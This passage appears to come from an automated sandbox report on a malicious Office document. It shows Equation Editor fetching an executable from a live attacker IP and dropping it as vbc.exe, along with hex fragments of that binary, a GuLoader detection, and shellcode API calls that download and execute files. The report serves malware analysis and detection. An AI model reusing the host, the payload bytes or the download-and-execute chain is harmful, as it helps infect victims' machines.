May 12, 2022 09:27:58.888977051 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.888993979 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.889009953 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.889027119 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.889117956 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.891944885 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897017002 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897048950 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897064924 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897077084 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897093058 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897109985 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897121906 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897134066 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897147894 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897161961 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897173882 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897185087 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897197962 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897212029 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897223949 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897236109 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897252083 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897268057 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897281885 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.897310972 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897367954 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897375107 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897380114 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897383928 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.897907972 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915276051 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915318966 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915342093 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915363073 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915385008 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915405989 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915489912 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915512085 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915533066 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915535927 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915554047 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915575981 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915584087 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915596008 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915599108 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915620089 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915638924 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915641069 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915664911 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915713072 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915738106 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915759087 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915781021 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915803909 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915806055 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915826082 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915832996 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915848970 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915863037 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915868998 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915889978 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915890932 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.915935993 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.915955067 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.917907953 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.112030029 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112095118 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112138033 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112179995 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112219095 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112261057 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112301111 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112338066 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.112591982 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.112648010 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.112658024 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.112663031 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.112668037 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.114722967 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114767075 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114804029 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114845037 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114883900 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114923954 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.114929914 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.114984035 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.114989042 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.115025997 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120239019 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120284081 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120326042 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120363951 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120404005 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120443106 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120445967 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120505095 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120518923 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120563030 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120563984 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120600939 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120604038 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120644093 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120646954 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120688915 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120687962 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120732069 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120733976 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120770931 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120770931 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120814085 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120852947 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120857000 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120897055 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120938063 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120943069 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.120978117 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.120980978 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121016979 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121018887 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121057987 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121062040 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121100903 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121134996 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121140957 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121148109 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121182919 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121184111 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121222973 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121264935 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121301889 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121305943 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121341944 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:59.121345997 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121381044 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121448994 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:59.121457100 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:28:02.841547012 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:28:03.041457891 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:28:03.041631937 CEST	49173	80	192.168.2.22	103.149.13.182

HTTP Request Dependency Graph

103.149.13.182

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	103.149.13.182	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 12, 2022 09:27:57.325670004 CEST	2	OUT	GET /msdrive10/.svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.149.13.182 Connection: Keep-Alive
May 12, 2022 09:27:57.549187899 CEST	3	IN	HTTP/1.1 200 OK Date: Thu, 12 May 2022 07:27:56 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 10 May 2022 23:41:34 GMT ETag: "4fcbf-5deb0dd783b2f" Accept-Ranges: bytes Content-Length: 326847 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELhOah:5@>@`=Y.textpfh `.rdatal@@.datax9@.ndata:.rsrcY`=Z@@
May 12, 2022 09:27:57.549215078 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 70 8a 7a 00 8d 45 a4 Data Ascii: U\}t+}FEuHhzHPuuu@BSV5pzEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
May 12, 2022 09:27:57.549237013 CEST	6	IN	Data Raw: 7a 00 e9 f9 16 00 00 8b 88 40 8b 7a 00 89 88 e0 8a 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 e0 8a 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 e0 8a 7a 00 57 e9 31 16 00 00 8b 0d 30 7a 7a 00 8b 35 50 Data Ascii: z@zzE4z3;#MDE4zW10zz5P@;tuQEDzz;PQjuP@nmjPEH;tZj\V7Hf>ff;u9]tDtuIDuD;t=uu
May 12, 2022 09:27:57.549256086 CEST	7	IN	Data Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb Data Ascii: fuSjUY;YUu;\|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
May 12, 2022 09:27:57.772262096 CEST	9	IN	Data Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 c8 35 00 00 56 e8 43 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 c3 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 84 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40 Data Ascii: uGSVj5VC;;j9]t!VI9]\|PuD;tEV$@4jPMH;tvuMDvQEffjuMEQPjHEf;fEVj@8@;EjpHjEfHuEVSuU
May 12, 2022 09:27:57.772303104 CEST	10	IN	Data Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 c8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
May 12, 2022 09:27:57.772331953 CEST	12	IN	Data Raw: 08 e8 a4 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=zUEi5z;\|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
May 12, 2022 09:27:57.772360086 CEST	13	IN	Data Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 88 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uL6yy;rPjdQ@PEh@PT@EPuD@EPhuE+3V39t$ty;tP8@5y^95y
May 12, 2022 09:27:57.772386074 CEST	14	IN	Data Raw: 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 ce 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 60 81 40 00 c2 04 Data Ascii: 9u}uVWujXuE_^[t$t$5@+jjt$5@`@VX{V2Vu)u^V(V%VhP{1+^USVWj _3h]E@]@5@P]]u8Pf
May 12, 2022 09:27:57.772409916 CEST	16	IN	Data Raw: 00 bf 08 f7 79 00 a1 70 8a 7a 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 68 7b 00 ff 15 e4 80 40 00 85 c0 74 2c 53 57 e8 de 28 00 00 a1 70 8a 7a 00 ff b0 24 01 00 00 57 e8 4a 2b 00 00 57 e8 ea 20 00 Data Ascii: ypz W+Wp@9]t>jWhh{@t,SW(pz$WJ+W ;tP$@]fzMuSV(3@9]th u'!j@9ztvEPj(@P$@t/EPh0@S @SSESPSuEE@j7.;
May 12, 2022 09:27:57.772437096 CEST	17	IN	Data Raw: 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 3c 7a 7a 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 a1 8c 8a 7a 00 8b 35 88 8a 7a 00 85 c0 74 1b 8b f8 8b 06 85 c0 74 0a 50 8d 46 18 50 e8 0d 26 00 00 81 c6 Data Ascii: Qufu3<zzPW=%/z5zttPFP&Ou_^][V`zzjV%V5(zD@^SUVt$$;WaU\|$$3GujUUUUW5(z@\$,uBHP5(zP@jW@%

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 2452, Parent PID: 576

General

Target ID:	0
Start time:	09:28:13
Start date:	12/05/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fa20000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 2644, Parent PID: 576

General

Target ID:	2
Start time:	09:28:36
Start date:	12/05/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 2156, Parent PID: 2644

General

Target ID:	4
Start time:	09:28:43
Start date:	12/05/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x400000
File size:	326847 bytes
MD5 hash:	D5E55A57372BCAD45FBB260105179CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 2644, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59%
Total number of Nodes:	161
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03570435 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(03570427), ref: 03570435

Part of subcall function 0357044F: URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
Part of subcall function 0357044F: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
Part of subcall function 0357044F: ExitProcess.KERNEL32(00000000), ref: 0357053E

Strings

<, xrefs: 035704D0

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID: <
API String ID: 2508257586-4251816714
Opcode ID: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
Instruction ID: 151643cae512d2d2afddf649385455d42017b39da4f8458ec7c610f963d8cdef
Opcode Fuzzy Hash: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
Instruction Fuzzy Hash: 0B316BE680C3C12FD7239730AC69666BFA5AB57214F5989CED4C24A0F3E6688501C756

Uniqueness

Uniqueness Score: -1.00%

Function 035703A9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
ShellExecuteExW.SHELL32(0000003C), ref: 03570526
ExitProcess.KERNEL32(00000000), ref: 0357053E

Strings

<, xrefs: 035704D0

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
Instruction ID: c0b9017e5df352b2dba4295650580992198e86905bc766d581b5e97a8a2dcbba
Opcode Fuzzy Hash: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
Instruction Fuzzy Hash: DC51BCA680D3C16FD722D730BC69665BFA2BB53200F5D8ACED4C64B0F3E6688505C756

Uniqueness

Uniqueness Score: -1.00%

Function 035703C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
ShellExecuteExW.SHELL32(0000003C), ref: 03570526
ExitProcess.KERNEL32(00000000), ref: 0357053E

Strings

<, xrefs: 035704D0

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
Instruction ID: 58a9f7820f0207521991134d86c0af598e3b4d2757b6c32b6a773668cf92d909
Opcode Fuzzy Hash: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
Instruction Fuzzy Hash: B841AAA680D3C16FD723EB30BC6965ABFA1BF53100F498ACE94C64B0F3E6689505C756

Uniqueness

Uniqueness Score: -1.00%

